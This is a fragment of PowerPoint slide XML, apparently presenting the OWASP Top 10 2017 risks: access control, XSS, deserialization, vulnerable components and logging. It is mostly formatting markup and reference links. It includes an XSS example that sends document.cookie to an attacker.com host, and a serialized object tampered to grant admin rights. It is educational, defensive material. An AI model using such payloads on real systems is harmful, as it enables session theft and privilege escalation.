                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="90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rgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>pstmt.setString(1, request.getParameter("acct"));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  ResultSet results = pstmt.executeQuery( );</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rgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>http://example.com/app/accountInfo?acct=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1">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ru-RU" sz="900" b="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  http://example.com/app/getappInfo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  http://example.com/app/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1">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ru-RU" sz="900" b="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>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rPr>
              <a:t>page, this is a flaw.</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r>
              <a:rPr lang="ru-RU" sz="90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Metadata manipulation, such as replaying or tampering with a JSON Web Token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ru-RU" sz="1200" b="1">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Proactive Controls: Access Controls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 V4 Access Control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Testing Guide: Authorization Testing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Cheat Sheet: Access Control</a:t>
            </a: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CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')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CWE-284: Improper Access Control (Authorization)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CWE-285: Improper Authorization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CWE-639: Authorization Bypass Through User-Controlled Key</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PortSwigger: Exploiting CORS Misconfiguration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ru-RU" sz="90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ru-RU" sz="90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A5</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ru-RU" sz="900">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId13"/>
                        </a:rPr>
                        <a:t>SAST</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> and </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hlinkClick r:id="rId14"/>
                        </a:rPr>
                        <a:t>DAST</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="90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#1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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#2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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#3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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#4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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software is out of date or vulnerable (see </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1">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5"/>
              </a:rPr>
              <a:t>OWASP Testing Guide: Configuration Management</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OWASP Testing Guide: Testing for Error Codes</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Security Headers Project</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>V19 Configuration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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NIST Guide to General Server Hardening</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CWE-2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="" action="ppaction://noaction"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>Environmental Security Flaws</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CWE-16: Configuration</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CWE-388: Error Handling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>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CIS Security Configuration Guides/Benchmarks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>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4"/>
              </a:rPr>
              <a:t>Amazon S3 Bucket Discovery and Enumeration</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ru-RU" sz="900" b="1">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sz="90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Sending security directives to clients, e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>Security Headers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU"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A6</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ru-R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 unused pages,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ru-RU" sz="90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ru-RU"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ru-RU"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Scenario 1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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ru-RU" sz="900" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  (String) page += "&lt;input name='creditcard' type='TEXT'</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value=</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request.getParameter("CC")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&gt;&lt;script&gt;document.location=</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http://www.attacker.com/cgi-bin/cookie.cgi?</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foo=</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+document.cookie&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>'</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Note:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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sz="90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Reflected XSS:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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Stored XSS:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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DOM XSS:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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ru-RU" sz="90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DOM node replacement or defacement (such as trojan login panels),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Proactive Controls: Encode Data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Proactive Controls: Validate Data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Testing Guide: Testing for Stored XSS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Testing Guide: Testing for DOM XSS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OWASP Cheat Sheet: XSS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OWASP Cheat Sheet: DOM based XSS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Cheat Sheet: XSS Filter Evasion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OWASP Java Encoder Project</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3"/>
              </a:rPr>
              <a:t>CWE-79: Improper neutralization of user supplied input</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4"/>
              </a:rPr>
              <a:t>PortSwigger: Client-side template injection</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sz="90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ru-RU"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p>
          <a:p>
            <a:pPr marL="82550"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ru-RU"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ru-RU"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Content Security Policy (CSP)</a:t>
            </a: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A7</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Technical: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ru-RU" sz="90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ru-RU" sz="90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HTTP cookies, HTML form parameters, API authentication tokens </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="ru-RU" sz="90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  a:4:{i:0;i:132;i:1;s:7:"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Mallory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>";i:2;s:4:"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1">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    i:3;s:32:"b6a8b3bea87fe0e05022f8f3c88bc960";}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>An attacker changes the serialized </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>object to give themselves admin privileges:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>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a:4:{i:0;i:1;i:1;s:5:"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Alice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>";i:2;s:5:"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1">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Cheat Sheet: Deserialization</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OWASP Proactive Controls: Validate All Inputs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AppSecUSA 2017: Friday the 13th JSON Attacks</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CWE-502: Deserialization of Untrusted Data</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Java Unmarshaller Security</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AppSec Cali 2015: Marshalling Pickles</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Exploitability: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b="0" i="0">
                          <a:solidFill>
                            <a:srgbClr val="24292E"/>
                          </a:solidFill>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sz="900">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId12"/>
                        </a:rPr>
                        <a:t>industry survey</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="90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ru-RU" sz="900" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Scenario #1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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CVE-2017-5638</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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While </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>internet of things (IoT)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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ru-RU" sz="90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Shodan IoT search engine can help you </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>find devices</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> that still suffer from the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>Heartbleed vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> that was patched in April 2014.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU"/>
            </a:br>
            <a:endParaRPr lang="ru-RU"/>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r>
              <a:rPr lang="ru-RU" sz="90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ru-RU" sz="900" b="1">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ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" sz="900">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="ru-RU" sz="90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r>
              <a:rPr lang="ru-RU" sz="800" b="1">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OWASP Virtual Patching Best Practices</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5"/>
              </a:rPr>
              <a:t>National Vulnerability Database (NVD)</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7"/>
              </a:rPr>
              <a:t>Node Libraries Security Advisories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ru-RU" sz="900">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId18"/>
              </a:rPr>
              <a:t>and Tools</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ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId19"/>
              </a:rPr>
              <a:t>versions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>DependencyCheck</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId16"/>
              </a:rPr>
              <a:t>retire.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, etc. Continuously monitor sources like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId20"/>
              </a:rPr>
              <a:t>CVE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t>NVD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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Subscribe to email alerts for security vulnerabilities related to components you use.</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ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId21"/>
              </a:rPr>
              <a:t>virtual patch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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ru-RU"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU"/>
            </a:br>
            <a:endParaRPr lang="ru-RU"/>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A9</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Using Components </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU">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Prevalence:</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p>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="90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ru-RU" sz="900">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="90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Penetration testing and scans by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>DAST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> tools (such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>OWASP ZAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) do not trigger alerts.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ru-RU" sz="900" b="1">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ru-RU" sz="90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p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" u="sng">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OWASP Cheat Sheet: Logging</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">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CWE-223: Omission of Security-relevant Information</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CWE-778: Insufficient Logging</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
